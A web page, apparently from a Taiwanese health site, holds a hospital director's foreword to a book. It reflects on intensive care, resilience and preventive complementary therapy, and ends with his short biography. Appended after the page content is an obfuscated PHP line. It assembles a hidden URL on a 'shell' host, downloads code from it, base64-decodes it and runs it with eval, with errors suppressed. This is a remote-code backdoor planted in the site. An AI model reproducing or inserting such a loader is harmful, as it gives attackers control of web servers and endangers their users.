收藏本站
推薦序 列印 E-mail
文章索引
推薦序
頁 2
頁 3
頁 4
頁 5
頁 6
頁 7
頁 8

養兵千日 預防至上

唐高駿 陽明大學附設醫院院長

劉醫師利用各種不同的治療及輔助療法,在病情危急 前防止或延緩器官衰竭,甚至加速康復,應是未來醫學的趨勢。

做為一個加護病房的醫師,面對的是立即死亡的挑 戰,生死交關,就是這麼嚴酷!因為病人一旦脫離維生設 備就無法存活,此時很難相信另類療法或中醫的固本強身 理念。但是在工作十幾年後,我發現有的病人就是比較 強、比較耐命,可以早日脫離呼吸器;有的病患則是出乎 預料的病情急轉直下,沒有明顯原因。

近年來,知道〝遺傳〞扮演了一些角色;而似乎病 患之前的生活習慣,尤其是曾經調養過的病患,在受到外 傷、感染等重大生命威脅時,更有餘力來渡過難關。

自己的生活經驗及體會,讓我慢慢對養生等另類療法 有了新的看法。傳統醫療固然在病患器官衰竭、生死存亡之際幫助有限,然而我相信,劉醫師利用各種不同的治療及輔助療法,在病情危急之前所進行的努力,應可防止或 延緩器官衰竭的發生,甚至加速其康復。

這一切,都有待我們及劉醫師利用科學方法來證實。



唐高駿 簡介

經歷:

‧署立宜蘭醫院院長
‧台北市立聯合醫院忠孝院區院長


現職:

‧陽明大學附設醫院院長
‧陽明大學教授



 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));